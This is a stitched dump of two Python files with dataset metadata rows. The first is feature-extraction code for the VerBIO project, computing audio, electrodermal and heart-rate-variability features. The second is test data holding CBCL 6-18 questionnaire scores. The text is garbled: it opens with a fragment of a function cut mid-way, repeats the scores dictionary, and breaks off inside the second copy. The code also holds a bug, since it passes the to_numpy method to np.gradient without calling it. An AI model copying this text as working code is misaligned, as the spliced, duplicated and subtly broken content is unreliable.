if frame_length >= 30.0 or math.isclose(frame_length, 30.0): # Minimum required window for accurate freq + nonlinear features
feature_df = nk.hrv(info['PPG_Peaks'], sampling_rate=sr)
else:
feature_df = nk.hrv_time(info['PPG_Peaks'], sampling_rate=sr)
feature_df['t0'] = [i*frame_skip]
feature_df['tn'] = [(i*frame_skip)+frame_length]
feature_dfs[i] = feature_df
df = pd.concat(feature_dfs, axis=0)
df = df.sort_values(by=['t0']).reset_index(drop=True)
return df
| 34.788991 | 199 | 0.727233 | """Feature extraction code for the VerBIO project
"""
import pandas as pd
import numpy as np
from scipy import stats
import opensmile
from scipy.io import wavfile
import preprocessing
import neurokit2 as nk
import scipy
import math
def get_df_gradient(df, feature_keys):
"""Given a list of keys for a dataframe, takes the gradient of those features and adds it to a new
column with '_grad' appended to the original key name.
Parameters
----------
df : Pandas dataframe
Dataframe that has columns in feature_keys
feature_keys : list[str]
Keys in the dataframe we want to take the gradient of
Returns
-------
df : Pandas dataframe
Modified Dataframe with new gradient keys
grad_keys : list[str]
New keys added with '_grad' appended to it
"""
grad_keys = []
for key in feature_keys:
new_key = key+'_grad'
df[new_key] = np.gradient(df[key].to_numpy, axis=0, dtype='float64')
grad_keys.append(new_key)
return df, grad_keys
def format_extracted_features(df, target_keys=[], time_key='', repair_fns={}, shift_fn=None, lookback_fn=None, sampling_fn=None):
"""Summary
Parameters
----------
df : Pandas dataframe
Dataframe that holds our features, does NOT contain the outcome (i.e., only 'X', not 'y')
target_keys : list[str], optional
Keep only 'target_keys' and drop the rest. If empty (or not specified), then keep all columns
time_key : str, optional
If there is a time key in the dataframe that needs to be dropped, then specify it. Otherwise
we assume there is no time key in the dataframe
repair_fns : list, optional
A dictionary of lambda functions, where the key to the function is the key
in the dataframe that we repair. By default, every key is eventually repaired
with interpolation
shift_fn : None, optional
An optional lambda function to shift the data back or forward in time
sampling_fn : None, optional
An optional lambda function to upsample or downsample the data
Returns
-------
df : Pandas dataframe
The prepared dataframe for training
"""
if len(target_keys) > 0:
kept_keys = set()
kept_keys.update(target_keys)
if time_key != '': kept_keys.add(time_key)
for key in df.columns:
if key not in kept_keys: df.drop(columns=key, inplace=True)
if len(repair_fns) > 0:
for key in repair_fns.keys():
df[key] = repair_fns[key](df[key])
# Regardless of repair functions, every column needs to be repaired just in case
df = preprocessing.repair_dataframe(df, 'inter')
# Shift, remove time key, then resample (this is correct, see on paper)
# TODO: Support multiple shift functions
if shift_fn != None: df = shift_fn(df)
if time_key != None and time_key in df.columns: df = df.drop(columns=time_key)
# Lookback happens here
if lookback_fn != None: df = lookback_fn(df)
# TODO: Support multiple sampling functions
if sampling_fn != None: df = sampling_fn(df)
return df
def format_annotation(df, window_size=1, stride=1, window_fn=lambda x: np.mean(x, axis=0), threshold=None, time_key='', target_keys=[]):
"""Prepare the annotation features to be used for training.
Parameters
----------
df : Pandas dataframe
Dataframe containing annotations of anxiety levels
window_size : float
Length of the window in seconds to apply to the annotations
stride : float
Stride of the window in seconds to apply to the annotations
window_fn : function, optional
Optional window function to be apply to the annotations. Default to mean
threshold : int, optional
Threshold to binarize the data. If annotation < threshold, 0, otherwise 1
time_key : str, optional
If there is a time key in the dataframe that needs to be dropped, then specify it. Otherwise
we assume there is no time key in the dataframe
target_keys : list, optional
Keep only 'target_keys' and drop the rest. If empty (or not specified), then keep all columns
Returns
-------
df : Pandas dataframe
The prepared dataframe for training
"""
# TODO: Allow to combine annotators
if target_keys != None:
kept_keys = set()
kept_keys.update(target_keys)
if time_key != None:
kept_keys.add(time_key)
for key in df.columns:
if key not in kept_keys: df.drop(columns=key, inplace=True)
df = preprocessing.repair_dataframe(df, 'inter')
df = preprocessing.window_dataframe(df, time_key, window_size, stride, window_fn)
if threshold != None: df = preprocessing.binarize_dataframe(df, threshold, target_keys)
if time_key != '' and time_key in df.columns: df = df.drop(columns=time_key)
return df
def get_audio_features(signal, sr, frame_length, frame_skip, feature_set='eGeMAPSv02', feature_level='LLDs'):
"""Extract ComParE16 features using the OpenSMILE toolkit
Parameters
----------
signal : ndarray
Array of signal data from audio file
sr : int
Sampling rate of audio
frame_length : float
Time in seconds of window during extraction
frame_skip : float
Stride in seconds of window during windowing
times : ndarray, optional
Used to make this broadcastable (unused since times are inferred)
time_key : str, optional
Optional time key to include for a time axis in the new dataframe.
Default to 'Time (s)'. The time is assumed to start at 0 and
is inferred from the sampling rate
Returns
-------
df : Pandas dataframe
Dataframe with the ComParE16 features with a time axis specified by time_key
"""
# Times are inferred!
n_samples = signal.shape[0]
# Frame length and frame skip in samples
samples_per_frame = int(sr*frame_length)
samples_per_skip = int(sr*frame_skip)
# For functionals: OpenSMILE does the windowing for you
# For LLD's: OpenSMILE does NOT window for you. It does leave windows, but those are just from the extractor
if feature_set == 'eGeMAPSv02': feature_set_param = opensmile.FeatureSet.eGeMAPSv02
elif feature_set == 'ComParE16': feature_set_param = opensmile.FeatureSet.ComParE_2016
else: raise ValueError(f'Unrecognized feature_set {feature_set}')
if feature_level == 'LLDs': feature_level_param = opensmile.FeatureLevel.LowLevelDescriptors
elif feature_level == 'Functionals': feature_level_param = opensmile.FeatureLevel.Functionals
else: raise ValueError(f'Unrecognized feature_level {feature_level}')
smile = opensmile.Smile(feature_set=feature_set_param, feature_level=feature_level_param)
windowed_dfs = preprocessing.window_array(
signal,
samples_per_frame,
samples_per_skip,
lambda x: smile.process_signal(x, sr),
)
if feature_level == 'LLDs':
# Since OpenSmile doesn't window for us, we just do it here by taking the mean
for i, df in enumerate(windowed_dfs):
df = df.reset_index(drop=True).astype('float64')
windowed_dfs[i] = df.mean(axis=0).to_frame().T
n_windows = len(windowed_dfs) # sketchy...
start_times = np.arange(0.0, (frame_skip*n_windows), frame_skip)
end_times = np.arange(frame_length, (frame_skip*n_windows)+frame_length, frame_skip)
df = pd.concat(windowed_dfs, axis=0)
df['t0'] = start_times
df['tn'] = end_times
# Just to be safe..
df = df.sort_values(by=['t0']).reset_index(drop=True)
return df
def get_EDA_features(signal, sr, frame_length, frame_skip, times):
"""Summary
Parameters
----------
signal : ndarray
Array of EDA data
sr : int
Sampling rate of EDA data
times : ndarray
Timestamps of each EDA sample TODO: Allow this to be inferred from sr
frame_length : float
Windowing length for data in seconds
frame_skip : float
Window stride for data in seconds
time_key : str, optional
Optional time key to include for a time axis in the new dataframe.
Default to 'Time (s)'. The time is assumed to start at 0 and
is inferred from the sampling rate
Returns
-------
df : Pandas dataframe
Windowed EDA features
"""
# TODO: Not sure if we should window the samples, then extract
# or extract, then window samples. My guess is it doesn't matter!
order = 4
w0 = 1.5 # Cutoff frequency for Butterworth (should I remove?)
w0 = 2 * np.array(w0) / sr
signal = nk.signal_sanitize(signal)
b, a = scipy.signal.butter(N=order, Wn=w0, btype='lowpass', analog=False, output='ba')
filtered = scipy.signal.filtfilt(b, a, signal)
signal_clean = nk.signal_smooth(filtered, method='convolution', kernel='blackman', size=48)
signal_decomp = nk.eda_phasic(signal_clean, sampling_rate=sr)
signal_peak, info = nk.eda_peaks(
signal_decomp['EDA_Phasic'].values,
sampling_rate=sr,
method='biosppy',
amplitude_min=0.1
)
# Only window nonzero amplitudes
df = pd.DataFrame({
'SCL': preprocessing.window_timed_array(times, signal_decomp['EDA_Tonic'].to_numpy(), frame_length, frame_skip),
'SCR_Amplitude': preprocessing.window_timed_array(times, signal_peak['SCR_Amplitude'].to_numpy(), frame_length, frame_skip, lambda x: np.mean(x[np.nonzero(x)]) if len(np.nonzero(x)[0]) > 0 else 0),
'SCR_Onsets': preprocessing.window_timed_array(times, signal_peak['SCR_Onsets'].to_numpy(), frame_length, frame_skip, lambda x: np.sum(x)),
'SCR_Peaks': preprocessing.window_timed_array(times, signal_peak['SCR_Peaks'].to_numpy(), frame_length, frame_skip, lambda x: np.sum(x)),
}) # Meh, recoverytime isn't really useful
start_times = np.arange(0.0, (frame_skip*(len(df.index))), frame_skip)
end_times = np.arange(frame_length, (frame_skip*(len(df.index)))+frame_length, frame_skip)
df['t0'] = start_times
df['tn'] = end_times
# Just to be safe..
df = df.sort_values(by=['t0']).reset_index(drop=True)
return df
def get_HRV_features(signal, sr, frame_length, frame_skip, times):
"""Extract HRV time-series features using BVP (PPG) or ECG data.
Extraction is done in a similar way as ComParE16.
# TODO: We could also just use IBI instead of finding peaks?
Parameters
----------
signal : ndarray
Array of BVP (PPG) or ECG data
sr : int
Sampling rate of BVP or ECG data
times : ndarray
Timestamps of each BVP/ECG sample TODO: Allow this to be inferred from sr
frame_length : float
Windowing length for data in seconds
frame_skip : float
Window stride for data in seconds
time_key : str, optional
Optional time key to include for a time axis in the new dataframe.
Default to 'Time (s)'. The time is assumed to start at 0 and
is inferred from the sampling rate
"""
# Unfortunately, we can't get good enough time series data unless
# BVP is at least 4 seconds in duration
assert frame_length >= 4.0 or math.isclose(frame_length, 4.0)
time_slices = preprocessing.get_window_slices(times, frame_length, frame_skip)
n_slices = len(time_slices)
feature_dfs = [None for _ in range(n_slices)]
for i in range(n_slices):
frame = signal[time_slices[i][0]:time_slices[i][1]+1]
frame_clean = nk.ppg_clean(frame, sampling_rate=sr)
info = nk.ppg_findpeaks(frame_clean, sampling_rate=sr)
if frame_length >= 30.0 or math.isclose(frame_length, 30.0): # Minimum required window for accurate freq + nonlinear features
feature_df = nk.hrv(info['PPG_Peaks'], sampling_rate=sr)
else:
feature_df = nk.hrv_time(info['PPG_Peaks'], sampling_rate=sr)
feature_df['t0'] = [i*frame_skip]
feature_df['tn'] = [(i*frame_skip)+frame_length]
feature_dfs[i] = feature_df
df = pd.concat(feature_dfs, axis=0)
df = df.sort_values(by=['t0']).reset_index(drop=True)
return df
| 0 | 0 | 0 |
185cabd14b5307ae851f8675295403e744d37ad0 | 12,203 | py | Python | backend/tests/internal/data/cbcl_6_18_scores.py | mkokotovich/cbcl_scoring | 86d8f636a980bce45fcf5fc7eccac5dffddfd3b8 | [
"MIT"
] | null | null | null | backend/tests/internal/data/cbcl_6_18_scores.py | mkokotovich/cbcl_scoring | 86d8f636a980bce45fcf5fc7eccac5dffddfd3b8 | [
"MIT"
] | 17 | 2019-12-26T16:45:10.000Z | 2022-03-21T22:16:37.000Z | backend/tests/internal/data/cbcl_6_18_scores.py | mkokotovich/testscoring | bc176caf37a2980d85a722efa919f416c9758a0e | [
"MIT"
] | null | null | null | scores = {"scores": [{"group": "I", "score": 7.0}, {"group": "II", "score": 5.0}, {"group": "III", "score": 2.0}, {"group": "IV", "score": 8.0}, {"group": "V", "score": 9.0}, {"group": "VI", "score": 16.0}, {"group": "VII", "score": 5.0}, {"group": "VIII", "score": 11.0}, {"group": "other", "score": 10.0}, {"group": "a", "score": 14.0}, {"group": "b", "score": 16.0}, {"group": "c", "score": 43.0}, {"group": "total", "score": 73.0}], "test": {"id": 9, "items": [{"id": 356, "number": "1", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 357, "number": "2", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 358, "number": "3", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 359, "number": "4", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 360, "number": "5", "description": "", "score": "0", "group": "II", "groups": ["II"]}, {"id": 361, "number": "6", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 362, "number": "7", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 363, "number": "8", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 364, "number": "9", "description": "", "score": "2", "group": "V", "groups": ["V"]}, {"id": 365, "number": "10", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 366, "number": "11", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 367, "number": "12", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 368, "number": "13", "description": "", "score": "1", "group": "VI", "groups": ["VI"]}, {"id": 369, "number": "14", "description": "", "score": "1", "group": "I", "groups": ["I"]}, {"id": 370, "number": "15", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 371, "number": "16", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 372, "number": "17", "description": "", "score": "0", "group": "VI", "groups": ["VI"]}, {"id": 373, "number": "18", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 374, "number": "19", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 375, "number": "20", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 376, "number": "21", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 377, "number": "22", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 378, "number": "23", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 379, "number": "24", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 380, "number": "25", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 381, "number": "26", "description": "", "score": "1", "group": "VII", "groups": ["VII"]}, {"id": 382, "number": "27", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 383, "number": "28", "description": "", "score": "2", "group": "VII", "groups": ["VII"]}, {"id": 384, "number": "29", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 385, "number": "30", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 386, "number": "31", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 387, "number": "32", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 388, "number": "33", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 389, "number": "34", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 390, "number": "35", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 391, "number": "36", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 392, "number": "37", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 393, "number": "38", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 394, "number": "39", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 395, "number": "40", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 396, "number": "41", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 397, "number": "42", "description": "", "score": "0", "group": "II", "groups": ["II"]}, {"id": 398, "number": "43", "description": "", "score": "1", "group": "VII", "groups": ["VII"]}, {"id": 399, "number": "44", "description": "", "score": "2", "group": "other", "groups": ["other"]}, {"id": 400, "number": "45", "description": "", "score": "2", "group": "I", "groups": ["I"]}, {"id": 401, "number": "46", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 402, "number": "47", "description": "", "score": "1", "group": "III", "groups": ["III"]}, {"id": 403, "number": "48", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 404, "number": "49", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 405, "number": "50", "description": "", "score": "2", "group": "I", "groups": ["I"]}, {"id": 406, "number": "51", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 407, "number": "52", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 408, "number": "53", "description": "", "score": "2", "group": "other", "groups": ["other"]}, {"id": 409, "number": "54", "description": "", "score": "1", "group": "III", "groups": ["III"]}, {"id": 410, "number": "55", "description": "", "score": "2", "group": "other", "groups": ["other"]}, {"id": 411, "number": "56a", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 412, "number": "56b", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 413, "number": "56c", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 414, "number": "56d", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 415, "number": "56e", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 416, "number": "56f", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 417, "number": "56g", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 418, "number": "56h", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 419, "number": "57", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 420, "number": "58", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 421, "number": "59", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 422, "number": "60", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 423, "number": "61", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 424, "number": "62", "description": "", "score": "2", "group": "IV", "groups": ["IV"]}, {"id": 425, "number": "63", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 426, "number": "64", "description": "", "score": "2", "group": "IV", "groups": ["IV"]}, {"id": 427, "number": "65", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 428, "number": "66", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 429, "number": "67", "description": "", "score": "1", "group": "VII", "groups": ["VII"]}, {"id": 430, "number": "68", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 431, "number": "69", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 432, "number": "70", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 433, "number": "71", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 434, "number": "72", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 435, "number": "73", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 436, "number": "74", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 437, "number": "75", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 438, "number": "76", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 439, "number": "77", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 440, "number": "78", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 441, "number": "79", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 442, "number": "80", "description": "", "score": "1", "group": "VI", "groups": ["VI"]}, {"id": 443, "number": "81", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 444, "number": "82", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 445, "number": "83", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 446, "number": "84", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 447, "number": "85", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 448, "number": "86", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 449, "number": "87", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 450, "number": "88", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 451, "number": "89", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 452, "number": "90", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 453, "number": "91", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 454, "number": "92", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 455, "number": "93", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 456, "number": "94", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 457, "number": "95", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 458, "number": "96", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 459, "number": "97", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 460, "number": "98", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 461, "number": "99", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 462, "number": "100", "description": "", "score": "2", "group": "V", "groups": ["V"]}, {"id": 463, "number": "101", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 464, "number": "102", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 465, "number": "103", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 466, "number": "104", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 467, "number": "105", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 468, "number": "106", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 469, "number": "107", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 470, "number": "108", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 471, "number": "109", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 472, "number": "110", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 473, "number": "111", "description": "", "score": "0", "group": "II", "groups": ["II"]}, {"id": 474, "number": "112", "description": "", "score": "2", "group": "I", "groups": ["I"]}, {"id": 475, "number": "113", "description": "", "score": "0", "group": "other", "groups": ["other"]}], "created_at": "2018-08-25T01:09:48.166593Z", "updated_at": "2018-08-25T01:09:48.166648Z", "client_number": "1", "test_type": "cbcl_6_18", "owner": 3}} | 12,203 | 12,203 | 0.484061 | scores = {"scores": [{"group": "I", "score": 7.0}, {"group": "II", "score": 5.0}, {"group": "III", "score": 2.0}, {"group": "IV", "score": 8.0}, {"group": "V", "score": 9.0}, {"group": "VI", "score": 16.0}, {"group": "VII", "score": 5.0}, {"group": "VIII", "score": 11.0}, {"group": "other", "score": 10.0}, {"group": "a", "score": 14.0}, {"group": "b", "score": 16.0}, {"group": "c", "score": 43.0}, {"group": "total", "score": 73.0}], "test": {"id": 9, "items": [{"id": 356, "number": "1", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 357, "number": "2", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 358, "number": "3", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 359, "number": "4", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 360, "number": "5", "description": "", "score": "0", "group": "II", "groups": ["II"]}, {"id": 361, "number": "6", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 362, "number": "7", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 363, "number": "8", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 364, "number": "9", "description": "", "score": "2", "group": "V", "groups": ["V"]}, {"id": 365, "number": "10", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 366, "number": "11", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 367, "number": "12", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 368, "number": "13", "description": "", "score": "1", "group": "VI", "groups": ["VI"]}, {"id": 369, "number": "14", "description": "", "score": "1", "group": "I", "groups": ["I"]}, {"id": 370, "number": "15", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 371, "number": "16", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 372, "number": "17", "description": "", "score": "0", "group": "VI", "groups": ["VI"]}, {"id": 373, "number": "18", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 374, "number": "19", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 375, "number": "20", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 376, "number": "21", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 377, "number": "22", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 378, "number": "23", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 379, "number": "24", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 380, "number": "25", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 381, "number": "26", "description": "", "score": "1", "group": "VII", "groups": ["VII"]}, {"id": 382, "number": "27", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 383, "number": "28", "description": "", "score": "2", "group": "VII", "groups": ["VII"]}, {"id": 384, "number": "29", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 385, "number": "30", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 386, "number": "31", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 387, "number": "32", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 388, "number": "33", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 389, "number": "34", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 390, "number": "35", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 391, "number": "36", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 392, "number": "37", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 393, "number": "38", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 394, "number": "39", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 395, "number": "40", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 396, "number": "41", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 397, "number": "42", "description": "", "score": "0", "group": "II", "groups": ["II"]}, {"id": 398, "number": "43", "description": "", "score": "1", "group": "VII", "groups": ["VII"]}, {"id": 399, "number": "44", "description": "", "score": "2", "group": "other", "groups": ["other"]}, {"id": 400, "number": "45", "description": "", "score": "2", "group": "I", "groups": ["I"]}, {"id": 401, "number": "46", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 402, "number": "47", "description": "", "score": "1", "group": "III", "groups": ["III"]}, {"id": 403, "number": "48", "description": "", "score": "0", "group": "IV", "groups": ["IV"]}, {"id": 404, "number": "49", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 405, "number": "50", "description": "", "score": "2", "group": "I", "groups": ["I"]}, {"id": 406, "number": "51", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 407, "number": "52", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 408, "number": "53", "description": "", "score": "2", "group": "other", "groups": ["other"]}, {"id": 409, "number": "54", "description": "", "score": "1", "group": "III", "groups": ["III"]}, {"id": 410, "number": "55", "description": "", "score": "2", "group": "other", "groups": ["other"]}, {"id": 411, "number": "56a", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 412, "number": "56b", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 413, "number": "56c", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 414, "number": "56d", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 415, "number": "56e", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 416, "number": "56f", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 417, "number": "56g", "description": "", "score": "0", "group": "III", "groups": ["III"]}, {"id": 418, "number": "56h", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 419, "number": "57", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 420, "number": "58", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 421, "number": "59", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 422, "number": "60", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 423, "number": "61", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 424, "number": "62", "description": "", "score": "2", "group": "IV", "groups": ["IV"]}, {"id": 425, "number": "63", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 426, "number": "64", "description": "", "score": "2", "group": "IV", "groups": ["IV"]}, {"id": 427, "number": "65", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 428, "number": "66", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 429, "number": "67", "description": "", "score": "1", "group": "VII", "groups": ["VII"]}, {"id": 430, "number": "68", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 431, "number": "69", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 432, "number": "70", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 433, "number": "71", "description": "", "score": "0", "group": "I", "groups": ["I"]}, {"id": 434, "number": "72", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 435, "number": "73", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 436, "number": "74", "description": "", "score": "1", "group": "other", "groups": ["other"]}, {"id": 437, "number": "75", "description": "", "score": "1", "group": "II", "groups": ["II"]}, {"id": 438, "number": "76", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 439, "number": "77", "description": "", "score": "0", "group": "other", "groups": ["other"]}, {"id": 440, "number": "78", "description": "", "score": "2", "group": "VI", "groups": ["VI"]}, {"id": 441, "number": "79", "description": "", "score": "1", "group": "IV", "groups": ["IV"]}, {"id": 442, "number": "80", "description": "", "score": "1", "group": "VI", "groups": ["VI"]}, {"id": 443, "number": "81", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 444, "number": "82", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 445, "number": "83", "description": "", "score": "0", "group": "V", "groups": ["V"]}, {"id": 446, "number": "84", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 447, "number": "85", "description": "", "score": "1", "group": "V", "groups": ["V"]}, {"id": 448, "number": "86", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 449, "number": "87", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 450, "number": "88", "description": "", "score": "1", "group": "VIII", "groups": ["VIII"]}, {"id": 451, "number": "89", "description": "", "score": "0", "group": "VIII", "groups": ["VIII"]}, {"id": 452, "number": "90", "description": "", "score": "0", "group": "VII", "groups": ["VII"]}, {"id": 453, "number": "91", "description": "", "score": "0", "group": "I", "groups": ["I"]}, 